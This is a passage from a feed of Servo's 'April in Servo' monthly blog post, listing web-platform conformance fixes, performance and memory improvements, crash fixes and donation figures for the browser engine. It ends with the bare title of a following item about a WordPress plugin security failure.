<strong>Spaces</strong> are now rendered correctly in <strong>2D &lt;canvas&gt;</strong>, instead of twice as wide as they should be (<a href="https://github.com/mrobinson">@mrobinson</a>, <a href="https://github.com/servo/servo/pull/43899">#43899</a>).</p>
<p><strong>&lt;a href&gt;</strong> now correctly resolves the URL with the page encoding (<a href="https://github.com/sabbCodes">@sabbCodes</a>, <a href="https://github.com/servo/servo/pull/43822">#43822</a>).</p>
<p>We’ve improved the default appearance of <strong>&lt;input type=file&gt;</strong> (<a href="https://github.com/sabbCodes">@sabbCodes</a>, <a href="https://github.com/servo/servo/pull/44496">#44496</a>) and <strong>&lt;textarea placeholder&gt;</strong> (<a href="https://github.com/mrobinson">@mrobinson</a>, <a href="https://github.com/servo/servo/pull/43770">#43770</a>).</p>
<p>All <strong>keyboard events</strong>, <strong>mouse events</strong>, <strong>wheel events</strong>, and <strong>pointer events</strong>, other than <strong>‘pointerenter’</strong> and <strong>‘pointerleave’</strong>, now <strong>bubble out of shadow roots</strong> (<a href="https://github.com/simonwuelker">@simonwuelker</a>, <a href="https://github.com/webbeef">@webbeef</a>, <a href="https://github.com/servo/servo/pull/43799">#43799</a>, <a href="https://github.com/servo/servo/pull/44094">#44094</a>).
<strong>‘error’ events</strong> on <strong>Window</strong> now report the correct <strong>filename</strong> (<strong>source</strong> in <strong>onerror</strong>) and <strong>lineno</strong> (<a href="https://github.com/Gae24">@Gae24</a>, <a href="https://github.com/servo/servo/pull/43632">#43632</a>).</p>
<p><strong>console.log()</strong> and friends now support <strong>printf-style formatting directives</strong>, although for now <code>%c</code> is ignored (<a href="https://github.com/TG199">@TG199</a>, <a href="https://github.com/servo/servo/pull/43897">#43897</a>).</p>
<p><strong>file: URLs</strong> are now considered <strong>secure contexts</strong>, so they can now use features like <strong>crypto.subtle</strong> and <strong>crypto.random­UUID</strong> (<a href="https://github.com/simonwuelker">@simonwuelker</a>, <a href="https://github.com/servo/servo/pull/43989">#43989</a>).</p>
<p><strong>Exception messages</strong> have improved in Location, Static­Range, and the HTML­Element family of types (<a href="https://github.com/arihant2math">@arihant2math</a>, <a href="https://github.com/MuhammadMouostafa">@MuhammadMouostafa</a>, <a href="https://github.com/treetmitterglad">@treetmitterglad</a>, <a href="https://github.com/servo/servo/pull/44282">#44282</a>, <a href="https://github.com/servo/servo/pull/43260">#43260</a>, <a href="https://github.com/servo/servo/pull/43882">#43882</a>).</p>
<p>We’ve improved the conformance of <strong>fetch algorithms</strong> (<a href="https://github.com/yezhizhen">@yezhizhen</a>, <a href="https://github.com/servo/servo/pull/43970">#43970</a>, <a href="https://github.com/servo/servo/pull/43798">#43798</a>), <strong>focus</strong> and <strong>tab navigation</strong> (<a href="https://github.com/mrobinson">@mrobinson</a>, <a href="https://github.com/servo/servo/pull/43842">#43842</a>, <a href="https://github.com/servo/servo/pull/44029">#44029</a>, <a href="https://github.com/servo/servo/pull/44360">#44360</a>, <a href="https://github.com/servo/servo/pull/43859">#43859</a>, <a href="https://github.com/servo/servo/pull/44535">#44535</a>), <strong>form submission</strong> (<a href="https://github.com/TG199">@TG199</a>, <a href="https://github.com/servo/servo/pull/43700">#43700</a>), <strong>JS modules</strong> (<a href="https://github.com/elomscansio">@elomscansio</a>, <a href="https://github.com/Gae24">@Gae24</a>, <a href="https://github.com/servo/servo/pull/43741">#43741</a>, <a href="https://github.com/servo/servo/pull/44179">#44179</a>, <a href="https://github.com/servo/servo/pull/44042">#44042</a>), <strong>page navigation</strong> (<a href="https://github.com/TimvdLippe">@TimvdLippe</a>, <a href="https://github.com/servo/servo/pull/43857">#43857</a>), <strong>&lt;svg view­Box&gt;</strong> (<a href="https://github.com/yezhizhen">@yezhizhen</a>, <a href="https://github.com/servo/servo/pull/44420">#44420</a>), <strong>‘attr()’</strong> (<a href="https://github.com/Loirooriol">@Loirooriol</a>, <a href="https://github.com/servo/servo/pull/43878">#43878</a>), <strong>‘:focus’</strong> (<a href="https://github.com/mrobinson">@mrobinson</a>, <a href="https://github.com/servo/servo/pull/43873">#43873</a>), <strong>‘font’</strong> (<a href="https://github.com/RichardTjokroutomo">@RichardTjokroutomo</a>, <a href="https://github.com/servo/servo/pull/44061">#44061</a>), <strong>‘@keyframes’</strong> (<a href="https://github.com/simonwuelker">@simonwuelker</a>, <a href="https://github.com/servo/servo/pull/43461">#43461</a>), <strong>‘@property’</strong> (<a href="https://github.com/Loirooriol">@Loirooriol</a>, <a href="https://github.com/servo/servo/pull/43878">#43878</a>), <strong>‘load’</strong> events (<a href="https://github.com/jdm">@jdm</a>, <a href="https://github.com/arabson99">@arabson99</a>, <a href="https://github.com/servo/servo/pull/43807">#43807</a>, <a href="https://github.com/servo/servo/pull/44046">#44046</a>), <strong>fetch­Later()</strong> (<a href="https://github.com/TimvdLippe">@TimvdLippe</a>, <a href="https://github.com/servo/servo/pull/43627">#43627</a>), <strong>axes</strong> and <strong>buttons</strong> on <strong>Gamepad</strong> (<a href="https://github.com/log101">@log101</a>, <a href="https://github.com/rovertrack">@rovertrack</a>, <a href="https://github.com/servo/servo/pull/44411">#44411</a>, <a href="https://github.com/servo/servo/pull/44357">#44357</a>), <strong>copy­Tex­Image­2D()</strong> on <strong>Web­GL­Rendering­Context</strong> (<a href="https://github.com/simartin">@simartin</a>, <a href="https://github.com/mrobinson">@mrobinson</a>, <a href="https://github.com/servo/servo/pull/43608">#43608</a>), <strong>tex­Image3D()</strong> on <strong>Web­GL2­Rendering­Context</strong> (<a href="https://github.com/simartin">@simartin</a>, <a href="https://github.com/servo/servo/pull/44367">#44367</a>), <strong>environment­Blend­Mode</strong> on <strong>XR­Session</strong> (<a href="https://github.com/msub2">@msub2</a>, <a href="https://github.com/servo/servo/pull/44155">#44155</a>), <strong>mark()</strong> and <strong>measure()</strong> on <strong>Performance</strong> (<a href="https://github.com/shubhamg13">@shubhamg13</a>, <a href="https://github.com/simonwuelker">@simonwuelker</a>, <a href="https://github.com/servo/servo/pull/44471">#44471</a>, <a href="https://github.com/servo/servo/pull/44199">#44199</a>, <a href="https://github.com/servo/servo/pull/43990">#43990</a>, <a href="https://github.com/servo/servo/pull/43753">#43753</a>), and <strong>Performance­Resource­Timing</strong> (<a href="https://github.com/shubhamg13">@shubhamg13</a>, <a href="https://github.com/servo/servo/pull/44228">#44228</a>).</p>
<p>We’ve fixed bugs related to <strong>console logging</strong> (<a href="https://github.com/sabbCodes">@sabbCodes</a>, <a href="https://github.com/servo/servo/pull/44243">#44243</a>), <strong>‘animation’</strong> (<a href="https://github.com/mrobinson">@mrobinson</a>, <a href="https://github.com/servo/servo/pull/44299">#44299</a>), <strong>‘box-shadow’</strong> (<a href="https://github.com/yezhizhen">@yezhizhen</a>, <a href="https://github.com/servo/servo/pull/44474">#44474</a>, <a href="https://github.com/servo/servo/pull/44457">#44457</a>), <strong>‘display: contents’</strong> (<a href="https://github.com/Loirooriol">@Loirooriol</a>, <a href="https://github.com/mrobinson">@mrobinson</a>, <a href="https://github.com/servo/servo/pull/44551">#44551</a>, <a href="https://github.com/servo/servo/pull/44299">#44299</a>), <strong>‘display: inline-flex’</strong> (<a href="https://github.com/SimonSapin">@SimonSapin</a>, <a href="https://github.com/servo/servo/pull/44281">#44281</a>), <strong>‘display: table-cell’</strong> (<a href="https://github.com/Loirooriol">@Loirooriol</a>, <a href="https://github.com/servo/servo/pull/44550">#44550</a>), <strong>‘display: table-row-group’</strong> (<a href="https://github.com/Veercodeprog">@Veercodeprog</a>, <a href="https://github.com/servo/servo/pull/43674">#43674</a>), <strong>‘overflow-x: clip’</strong> and <strong>‘overflow-y: clip’</strong> (<a href="https://github.com/Messi002">@Messi002</a>, <a href="https://github.com/servo/servo/pull/43620">#43620</a>), <strong>‘position: absolute’</strong> on grid items (<a href="https://github.com/nicoburns">@nicoburns</a>, <a href="https://github.com/servo/servo/pull/44324">#44324</a>), <strong>‘word-spacing: &lt;percentage&gt;’</strong> (<a href="https://github.com/sabbCodes">@sabbCodes</a>, <a href="https://github.com/servo/servo/pull/44031">#44031</a>), <strong>remove­Child()</strong> on <strong>Document</strong> (<a href="https://github.com/rovertrack">@rovertrack</a>, <a href="https://github.com/servo/servo/pull/44133">#44133</a>), and <strong>URL.revoke­Object­URL()</strong> (<a href="https://github.com/simonwuelker">@simonwuelker</a>, <a href="https://github.com/jdm">@jdm</a>, <a href="https://github.com/servo/servo/pull/43746">#43746</a>, <a href="https://github.com/servo/servo/pull/43977">#43977</a>, <a href="https://github.com/servo/servo/pull/44035">#44035</a>).</p>
<h3>Performance and stability <a class="header-anchor" href="https://servo.org/blog/2026/05/31/april-in-servo/#performance-and-stability">
        <span class="icon hashlink"><i class="fas fa-link"></i></span>
      </a></h3>
<p>We’ve fixed some big inefficiencies in Servo.
<strong>append­Child()</strong> with nested shadow roots is no longer <math xmlns="http://www.w3.org/1998/Math/MathML"><mrow><mi>O</mi><mrow><mo>(</mo><msup><mn>2</mn><mi>n</mi></msup><mo>)</mo></mrow></mrow></math> (<a href="https://github.com/yezhizhen">@yezhizhen</a>, <a href="https://github.com/webbeef">@webbeef</a>, <a href="https://github.com/servo/servo/pull/44016">#44016</a>), and we’ve halved the time it takes to load <a href="https://262.ecma-international.org/16.0/index.html">the ECMAScript spec</a> by fixing the <math xmlns="http://www.w3.org/1998/Math/MathML"><mrow><mi>O</mi><mrow><mo>(</mo><mtext>whole DOM tree</mtext><mo>)</mo></mrow></mrow></math> processing of <strong>‘id’</strong> and <strong>‘name’ attributes</strong> (<a href="https://github.com/simonwuelker">@simonwuelker</a>, <a href="https://github.com/servo/servo/pull/44120">#44120</a>, <a href="https://github.com/servo/servo/pull/44127">#44127</a>, <a href="https://github.com/servo/servo/pull/44117">#44117</a>).</p>
<p>Servo makes its <strong>first TLS connection</strong> in each session <strong>30–60 ms faster</strong> (<a href="https://github.com/jschwe">@jschwe</a>, <a href="https://github.com/servo/servo/pull/44242">#44242</a>), and we’ve instrumented the Servo and servoshell startup processes to find more opportunities for optimisation (<a href="https://github.com/jschwe">@jschwe</a>, <a href="https://github.com/servo/servo/pull/44443">#44443</a>, <a href="https://github.com/servo/servo/pull/44456">#44456</a>).</p>
<p>Like most browser engines, Servo is a multi-threaded (and sometimes multi-process) system requiring a great deal of IPC messages to keep everything connected.
<a href="https://book.servo.org/design-documentation/architecture.html">Two key components</a> of this system are the <strong>constellation</strong> thread, which manages the engine as a whole, and the <strong>script threads</strong> (or web processes), which render the web pages.
Sending these messages can be expensive though, so to <strong>reduce unnecessary IPC traffic</strong>, we’ve landed an optimisation that allows script threads to selectively receive only the relevant messages from the constellation (<a href="https://github.com/webbeef">@webbeef</a>, <a href="https://github.com/servo/servo/pull/43124">#43124</a>).</p>
<p>We’ve reduced the <strong>memory usage</strong> of each <strong>Attr</strong>, <strong>Text</strong>, and <strong>Character­Data</strong> node in the DOM by 16 bytes (<a href="https://github.com/mrobinson">@mrobinson</a>, <a href="https://github.com/Loirooriol">@Loirooriol</a>, <a href="https://github.com/servo/servo/pull/44074">#44074</a>), and <strong>fixed a memory leak</strong> when deleting <strong>&lt;video controls&gt;</strong> or <strong>&lt;audio controls&gt;</strong> (<a href="https://github.com/Messi002">@Messi002</a>, <a href="https://github.com/servo/servo/pull/43983">#43983</a>).</p>
<p>Our <strong>about:memory</strong> page is more accurate now too, with new tracking of <strong>libc memory allocations</strong> on macOS, improved tracking of libc memory allocations on Linux (<a href="https://github.com/jschwe">@jschwe</a>, <a href="https://github.com/servo/servo/pull/44037">#44037</a>), and more accurate tracking of Path­Buf and types in <code>tokio</code>, <code>http</code>, <code>data­_url</code>, and <code>urlpattern</code> (<a href="https://github.com/Narfinger">@Narfinger</a>, <a href="https://github.com/servo/servo/pull/43858">#43858</a>).</p>
<p>Less memory usage isn’t always better in browser engines though, because there are many kinds of caches and other optimisations we can do to make browsing the web faster, at the expense of increased memory usage.
For example, we can greatly speed up <strong>prototype checks</strong> for DOM objects by storing a number in each object that identifies the concrete type, at the expense of making each DOM object 64 bits larger (<a href="https://github.com/webbeef">@webbeef</a>, <a href="https://github.com/servo/servo/pull/44364">#44364</a>).</p>
<p>Layout can now <strong>reuse fragments</strong> in later reflows, in many cases that involve block layout or ‘position: absolute’ (<a href="https://github.com/mrobinson">@mrobinson</a>, <a href="https://github.com/lukewarlow">@lukewarlow</a>, <a href="https://github.com/Loirooriol">@Loirooriol</a>, <a href="https://github.com/servo/servo/pull/42904">#42904</a>, <a href="https://github.com/servo/servo/pull/44231">#44231</a>).
We’re also working on <strong>reusing shaping results</strong> in later reflows, and making inline layout more efficient (<a href="https://github.com/mrobinson">@mrobinson</a>, <a href="https://github.com/servo/servo/pull/44370">#44370</a>, <a href="https://github.com/servo/servo/pull/43974">#43974</a>, <a href="https://github.com/servo/servo/pull/44436">#44436</a>).</p>
<p>We’ve landed several changes that should reduce the <strong>binary size</strong> of Servo (<a href="https://github.com/rovertrack">@rovertrack</a>, <a href="https://github.com/mrobinson">@mrobinson</a>, <a href="https://github.com/nicoburns">@nicoburns</a>, <a href="https://github.com/Narfinger">@Narfinger</a>, <a href="https://github.com/servo/servo/pull/44227">#44227</a>, <a href="https://github.com/servo/servo/pull/44221">#44221</a>, <a href="https://github.com/servo/servo/pull/44303">#44303</a>, <a href="https://github.com/servo/servo/pull/44338">#44338</a>, <a href="https://github.com/servo/servo/pull/44428">#44428</a>, <a href="https://github.com/servo/servo/pull/44134">#44134</a>).</p>
<p>We’ve also reduced clones, allocations, borrow checks, GC rooting steps, and other operations in many parts of Servo (<a href="https://github.com/rovertrack">@rovertrack</a>, <a href="https://github.com/Narfinger">@Narfinger</a>, <a href="https://github.com/Loirooriol">@Loirooriol</a>, <a href="https://github.com/yezhizhen">@yezhizhen</a>, <a href="https://github.com/simonwuelker">@simonwuelker</a>, <a href="https://github.com/servo/servo/pull/44008">#44008</a>, <a href="https://github.com/servo/servo/pull/44544">#44544</a>, <a href="https://github.com/servo/servo/pull/44271">#44271</a>, <a href="https://github.com/servo/servo/pull/44279">#44279</a>, <a href="https://github.com/servo/servo/pull/43826">#43826</a>, <a href="https://github.com/servo/servo/pull/44052">#44052</a>, <a href="https://github.com/servo/servo/pull/44139">#44139</a>).</p>
<p>Several crashes have been fixed:</p>
<ul>
<li>in compressed­Tex­Sub­Image2D() on Web­GL­Rendering­Context (<a href="https://github.com/thebabalola">@thebabalola</a>, #44050)</li>
<li>in console.log() (<a href="https://github.com/thebabalola">@thebabalola</a>, <a href="https://github.com/servo/servo/pull/43844">#43844</a>)</li>
<li>in get­Data() on Data­Transfer (<a href="https://github.com/SimonSapin">@SimonSapin</a>, <a href="https://github.com/servo/servo/pull/44607">#44607</a>)</li>
<li>in remove() on Element (<a href="https://github.com/SimonSapin">@SimonSapin</a>, <a href="https://github.com/servo/servo/pull/44435">#44435</a>)</li>
<li>in replace­With() on Element (<a href="https://github.com/yezhizhen">@yezhizhen</a>, <a href="https://github.com/servo/servo/pull/44503">#44503</a>)</li>
<li>in <code>--debug-mozjs</code> builds (<a href="https://github.com/jdm">@jdm</a>, <a href="https://github.com/servo/servo/pull/44386">#44386</a>, <a href="https://github.com/servo/servo/pull/44573">#44573</a>, <a href="https://github.com/servo/servo/pull/44581">#44581</a>)</li>
<li>in flex and grid layout (<a href="https://github.com/mrobinson">@mrobinson</a>, <a href="https://github.com/nicoburns">@nicoburns</a>, <a href="https://github.com/servo/servo/pull/44424">#44424</a>, <a href="https://github.com/servo/servo/pull/44203">#44203</a>)</li>
<li>in layout queries like <code>offset­Height</code> (<a href="https://github.com/mrobinson">@mrobinson</a>, <a href="https://github.com/servo/servo/pull/44560">#44560</a>)</li>
<li>in the devtools Debugger tab, when stepping and when inspecting nested values (<a href="https://github.com/atbrakhi">@atbrakhi</a>, <a href="https://github.com/eerii">@eerii</a>, <a href="https://github.com/servo/servo/pull/44024">#44024</a>, <a href="https://github.com/servo/servo/pull/43995">#43995</a>)</li>
<li>when removing &lt;colgroup&gt; from the DOM (<a href="https://github.com/Loirooriol">@Loirooriol</a>, <a href="https://github.com/servo/servo/pull/43846">#43846</a>)</li>
<li>when running garbage collection (<a href="https://github.com/drasticactions">@drasticactions</a>, <a href="https://github.com/servo/servo/pull/43933">#43933</a>)</li>
<li>when running servoshell with a <a href="https://doc.rust-lang.org/1.88.0/std/primitive.u64.html"><code>u64</code></a> <code>--pref</code> (<a href="https://github.com/yezhizhen">@yezhizhen</a>, <a href="https://github.com/servo/servo/pull/44079">#44079</a>)</li>
<li>when shadow roots are deeply nested, or when calling attach­Shadow() removes elements from the flat tree (<a href="https://github.com/yezhizhen">@yezhizhen</a>, <a href="https://github.com/mrobinson">@mrobinson</a>, <a href="https://github.com/servo/servo/pull/43888">#43888</a>, <a href="https://github.com/servo/servo/pull/43930">#43930</a>, <a href="https://github.com/servo/servo/pull/44259">#44259</a>)</li>
<li>when <a href="https://storage.spec.whatwg.org/">web storage features</a> fail to write to disk or encounter SQLite errors (<a href="https://github.com/arihant2math">@arihant2math</a>, <a href="https://github.com/sabbCodes">@sabbCodes</a>, <a href="https://github.com/servo/servo/pull/43918">#43918</a>, <a href="https://github.com/servo/servo/pull/43949">#43949</a>)</li>
</ul>
<p>We fixed a crash in servoshell when pressing keys like Ctrl+2 or ⌘2 with not enough tabs open (<a href="https://github.com/mrobinson">@mrobinson</a>, <a href="https://github.com/servo/servo/pull/44070">#44070</a>).</p>
<p><strong>DOM data structures</strong> (<code>#[dom­_struct]</code>) can refer to one another, with the help of <a href="https://research.mozilla.org/2014/08/26/javascript-servos-only-garbage-collector/">garbage collection</a>.
But when DOM objects are being destroyed, those references can become invalid for a brief moment, depending on the order the GC finalizers run in.
This can be unsound if those references are accessed, which is a very easy mistake to make if the type has an <code>impl Drop</code>.
To help prevent that class of bug, we’re reworking our DOM types so that none of them have <code>#[dom­_struct]</code> and <code>impl Drop</code> at the same time (<a href="https://github.com/willypuzzle">@willypuzzle</a>, <a href="https://github.com/servo/servo/pull/44119">#44119</a>, <a href="https://github.com/servo/servo/pull/44501">#44501</a>, <a href="https://github.com/servo/servo/pull/44513">#44513</a>).</p>
<p>We’ve improved our static analysis for GC rooting (<a href="https://github.com/officialasishkumar">@officialasishkumar</a>, <a href="https://github.com/servo/servo/pull/44489">#44489</a>), and we’ve continued our long-running effort to <strong>use the Rust type system</strong> to make certain kinds of dynamic borrow failures impossible (<a href="https://github.com/sagudev">@sagudev</a>, <a href="https://github.com/TimvdLippe">@TimvdLippe</a>, <a href="https://github.com/Narfinger">@Narfinger</a>, <a href="https://github.com/elomscansio">@elomscansio</a>, <a href="https://github.com/Gae24">@Gae24</a>, <a href="https://github.com/rovertrack">@rovertrack</a>, <a href="https://github.com/yezhizhen">@yezhizhen</a>, <a href="https://github.com/nodelpit">@nodelpit</a>, <a href="https://github.com/servo/servo/pull/43174">#43174</a>, <a href="https://github.com/servo/servo/pull/43524">#43524</a>, <a href="https://github.com/servo/servo/pull/43928">#43928</a>, <a href="https://github.com/servo/servo/pull/43943">#43943</a>, <a href="https://github.com/servo/servo/pull/43942">#43942</a>, <a href="https://github.com/servo/servo/pull/43944">#43944</a>, <a href="https://github.com/servo/servo/pull/43946">#43946</a>, <a href="https://github.com/servo/servo/pull/43952">#43952</a>, <a href="https://github.com/servo/servo/pull/43975">#43975</a>, <a href="https://github.com/servo/servo/pull/44018">#44018</a>, <a href="https://github.com/servo/servo/pull/44175">#44175</a>, <a href="https://github.com/servo/servo/pull/44241">#44241</a>, <a href="https://github.com/servo/servo/pull/44368">#44368</a>, <a href="https://github.com/servo/servo/pull/44406">#44406</a>, <a href="https://github.com/servo/servo/pull/44441">#44441</a>, <a href="https://github.com/servo/servo/pull/44422">#44422</a>, <a href="https://github.com/servo/servo/pull/44475">#44475</a>, <a href="https://github.com/servo/servo/pull/44478">#44478</a>, <a href="https://github.com/servo/servo/pull/44484">#44484</a>, <a href="https://github.com/servo/servo/pull/44476">#44476</a>, <a href="https://github.com/servo/servo/pull/44490">#44490</a>, <a href="https://github.com/servo/servo/pull/44477">#44477</a>, <a href="https://github.com/servo/servo/pull/44494">#44494</a>, <a href="https://github.com/servo/servo/pull/44497">#44497</a>, <a href="https://github.com/servo/servo/pull/44498">#44498</a>, <a href="https://github.com/servo/servo/pull/44495">#44495</a>, <a href="https://github.com/servo/servo/pull/44505">#44505</a>, <a href="https://github.com/servo/servo/pull/44506">#44506</a>, <a href="https://github.com/servo/servo/pull/44507">#44507</a>, <a href="https://github.com/servo/servo/pull/44508">#44508</a>, <a href="https://github.com/servo/servo/pull/44509">#44509</a>, <a href="https://github.com/servo/servo/pull/44510">#44510</a>, <a href="https://github.com/servo/servo/pull/44512">#44512</a>, <a href="https://github.com/servo/servo/pull/44482">#44482</a>, <a href="https://github.com/servo/servo/pull/44527">#44527</a>, <a href="https://github.com/servo/servo/pull/44528">#44528</a>, <a href="https://github.com/servo/servo/pull/44531">#44531</a>, <a href="https://github.com/servo/servo/pull/44534">#44534</a>, <a href="https://github.com/servo/servo/pull/44542">#44542</a>, <a href="https://github.com/servo/servo/pull/44533">#44533</a>, <a href="https://github.com/servo/servo/pull/44543">#44543</a>, <a href="https://github.com/servo/servo/pull/44553">#44553</a>, <a href="https://github.com/servo/servo/pull/44547">#44547</a>, <a href="https://github.com/servo/servo/pull/44563">#44563</a>, <a href="https://github.com/servo/servo/pull/44562">#44562</a>, <a href="https://github.com/servo/servo/pull/44565">#44565</a>, <a href="https://github.com/servo/servo/pull/44558">#44558</a>, <a href="https://github.com/servo/servo/pull/44583">#44583</a>, <a href="https://github.com/servo/servo/pull/44606">#44606</a>, <a href="https://github.com/servo/servo/pull/44605">#44605</a>, <a href="https://github.com/servo/servo/pull/44608">#44608</a>, <a href="https://github.com/servo/servo/pull/44602">#44602</a>, <a href="https://github.com/servo/servo/pull/44584">#44584</a>, <a href="https://github.com/servo/servo/pull/44620">#44620</a>, <a href="https://github.com/servo/servo/pull/44590">#44590</a>, <a href="https://github.com/servo/servo/pull/44254">#44254</a>, <a href="https://github.com/servo/servo/pull/44628">#44628</a>, <a href="https://github.com/servo/servo/pull/44629">#44629</a>, <a href="https://github.com/servo/servo/pull/44638">#44638</a>, <a href="https://github.com/servo/servo/pull/44626">#44626</a>, <a href="https://github.com/servo/servo/pull/44081">#44081</a>).</p>
<p>Thanks to a wide range of people, we’ve also landed a bunch of cleanups and refactors (<a href="https://github.com/delan">@delan</a>, <a href="https://github.com/alice">@alice</a>, <a href="https://github.com/Skgland">@Skgland</a>, <a href="https://github.com/atbrakhi">@atbrakhi</a>, <a href="https://github.com/eerii">@eerii</a>, <a href="https://github.com/sabbCodes">@sabbCodes</a>, <a href="https://github.com/jdm">@jdm</a>, <a href="https://github.com/thebabalola">@thebabalola</a>, <a href="https://github.com/CynthiaOketch">@CynthiaOketch</a>, <a href="https://github.com/kkoyung">@kkoyung</a>, <a href="https://github.com/TimvdLippe">@TimvdLippe</a>, <a href="https://github.com/rovertrack">@rovertrack</a>, <a href="https://github.com/webbeef">@webbeef</a>, <a href="https://github.com/arabson99">@arabson99</a>, <a href="https://github.com/yezhizhen">@yezhizhen</a>, <a href="https://github.com/simonwuelker">@simonwuelker</a>, <a href="https://github.com/mrobinson">@mrobinson</a>, <a href="https://github.com/nicoburns">@nicoburns</a>, <a href="https://github.com/longvatrong111">@longvatrong111</a>, <a href="https://github.com/niyabits">@niyabits</a>, <a href="https://github.com/treetmitterglad">@treetmitterglad</a>, <a href="https://github.com/foresterre">@foresterre</a>, <a href="https://github.com/mukilan">@mukilan</a>, <a href="https://github.com/elomscansio">@elomscansio</a>, <a href="https://github.com/freyacodes">@freyacodes</a>, <a href="https://github.com/StaySafe020">@StaySafe020</a>, <a href="https://github.com/TG199">@TG199</a>, <a href="https://github.com/servo/servo/pull/43772">#43772</a>, <a href="https://github.com/servo/servo/pull/44006">#44006</a>, <a href="https://github.com/servo/servo/pull/43860">#43860</a>, <a href="https://github.com/servo/servo/pull/44121">#44121</a>, <a href="https://github.com/servo/servo/pull/44160">#44160</a>, <a href="https://github.com/servo/servo/pull/43884">#43884</a>, <a href="https://github.com/servo/servo/pull/44154">#44154</a>, <a href="https://github.com/servo/servo/pull/44569">#44569</a>, <a href="https://github.com/servo/servo/pull/43939">#43939</a>, <a href="https://github.com/servo/servo/pull/44003">#44003</a>, <a href="https://github.com/servo/servo/pull/44110">#44110</a>, <a href="https://github.com/servo/servo/pull/44122">#44122</a>, <a href="https://github.com/servo/servo/pull/43824">#43824</a>, <a href="https://github.com/servo/servo/pull/44635">#44635</a>, <a href="https://github.com/servo/servo/pull/44103">#44103</a>, <a href="https://github.com/servo/servo/pull/43978">#43978</a>, <a href="https://github.com/servo/servo/pull/44092">#44092</a>, <a href="https://github.com/servo/servo/pull/44114">#44114</a>, <a href="https://github.com/servo/servo/pull/44277">#44277</a>, <a href="https://github.com/servo/servo/pull/44454">#44454</a>, <a href="https://github.com/servo/servo/pull/44274">#44274</a>, <a href="https://github.com/servo/servo/pull/44237">#44237</a>, <a href="https://github.com/servo/servo/pull/44232">#44232</a>, <a href="https://github.com/servo/servo/pull/44167">#44167</a>, <a href="https://github.com/servo/servo/pull/44214">#44214</a>, <a href="https://github.com/servo/servo/pull/43820">#43820</a>, <a href="https://github.com/servo/servo/pull/43825">#43825</a>, <a href="https://github.com/servo/servo/pull/43810">#43810</a>, <a href="https://github.com/servo/servo/pull/43838">#43838</a>, <a href="https://github.com/servo/servo/pull/43841">#43841</a>, <a href="https://github.com/servo/servo/pull/43847">#43847</a>, <a href="https://github.com/servo/servo/pull/43875">#43875</a>, <a href="https://github.com/servo/servo/pull/43876">#43876</a>, <a href="https://github.com/servo/servo/pull/43889">#43889</a>, <a href="https://github.com/servo/servo/pull/43893">#43893</a>, <a href="https://github.com/servo/servo/pull/43896">#43896</a>, <a href="https://github.com/servo/servo/pull/43881">#43881</a>, <a href="https://github.com/servo/servo/pull/43906">#43906</a>, <a href="https://github.com/servo/servo/pull/43913">#43913</a>, <a href="https://github.com/servo/servo/pull/43908">#43908</a>, <a href="https://github.com/servo/servo/pull/43917">#43917</a>, <a href="https://github.com/servo/servo/pull/43910">#43910</a>, <a href="https://github.com/servo/servo/pull/43921">#43921</a>, <a href="https://github.com/servo/servo/pull/43924">#43924</a>, <a href="https://github.com/servo/servo/pull/43925">#43925</a>, <a href="https://github.com/servo/servo/pull/43907">#43907</a>, <a href="https://github.com/servo/servo/pull/43923">#43923</a>, <a href="https://github.com/servo/servo/pull/43916">#43916</a>, <a href="https://github.com/servo/servo/pull/43909">#43909</a>, <a href="https://github.com/servo/servo/pull/43911">#43911</a>, <a href="https://github.com/servo/servo/pull/43957">#43957</a>, <a href="https://github.com/servo/servo/pull/43969">#43969</a>, <a href="https://github.com/servo/servo/pull/43967">#43967</a>, <a href="https://github.com/servo/servo/pull/43915">#43915</a>, <a href="https://github.com/servo/servo/pull/43954">#43954</a>, <a href="https://github.com/servo/servo/pull/43963">#43963</a>, <a href="https://github.com/servo/servo/pull/43959">#43959</a>, <a href="https://github.com/servo/servo/pull/43955">#43955</a>, <a href="https://github.com/servo/servo/pull/44067">#44067</a>, <a href="https://github.com/servo/servo/pull/44068">#44068</a>, <a href="https://github.com/servo/servo/pull/44071">#44071</a>, <a href="https://github.com/servo/servo/pull/44084">#44084</a>, <a href="https://github.com/servo/servo/pull/44265">#44265</a>, <a href="https://github.com/servo/servo/pull/44115">#44115</a>, <a href="https://github.com/servo/servo/pull/44358">#44358</a>, <a href="https://github.com/servo/servo/pull/43848">#43848</a>).</p>
<h3>Donations <a class="header-anchor" href="https://servo.org/blog/2026/05/31/april-in-servo/#donations">
        <span class="icon hashlink"><i class="fas fa-link"></i></span>
      </a></h3>
<p>Thanks again for your generous support!
We are now receiving <strong>7349 USD/month</strong> (+2.5% from March) in recurring donations.
This helps us cover the cost of our <strong><a href="https://ci0.servo.org/">speedy</a> <a href="https://ci1.servo.org/">CI</a> <a href="https://ci2.servo.org/">and</a> <a href="https://ci3.servo.org/">benchmarking</a> <a href="https://ci4.servo.org/">servers</a></strong>, one of our latest <strong><a href="https://www.outreachy.org/alums/2025-06/#:~:text=Servo">Outreachy interns</a></strong>, and funding <strong><a href="https://servo.org/blog/2025/09/17/your-donations-at-work-funding-jdm/">maintainer work</a></strong> that helps more people contribute to Servo.</p>
<p>Servo is also on <a href="https://thanks.dev/">thanks.dev</a>, and already <strong>33 GitHub users</strong> (−4 from March) that depend on Servo are sponsoring us there.
If you use Servo libraries like <a href="https://crates.io/crates/url/reverse_dependencies">url</a>, <a href="https://crates.io/crates/html5ever/reverse_dependencies">html5ever</a>, <a href="https://crates.io/crates/selectors/reverse_dependencies">selectors</a>, or <a href="https://crates.io/crates/cssparser/reverse_dependencies">cssparser</a>, signing up for <a href="https://thanks.dev/">thanks.dev</a> could be a good way for you (or your employer) to give back to the community.</p>
<p>We now have <a href="https://servo.org/blog/2025/11/21/sponsorship-tiers/"><strong>sponsorship tiers</strong></a> that allow you or your organisation to donate to the Servo project with public acknowlegement of your support.
If you’re interested in this kind of sponsorship, please contact us at <a href="mailto:join@servo.org">join@servo.org</a>.</p>
<figure class="_fig"><div class="_flex">
    <div>
        <div><strong>7349</strong> USD/month</div>
        <div></div>
        <div></div>
        <div><strong>10000</strong></div>
    </div>
    <progress max="10000" value="7349"></progress>
</div></figure>
<p>Use of donations is decided transparently via the Technical Steering Committee’s public <strong><a href="https://github.com/servo/project/blob/main/FUNDING_REQUEST.md">funding request process</a></strong>, and active proposals are tracked in <a href="https://github.com/servo/project/issues/187">servo/project#187</a>.
For more details, head to our <a href="https://servo.org/sponsorship/">Sponsorship page</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[WordPress Plugin Security Failure Opens Door to Payment Data Theft]]></title>
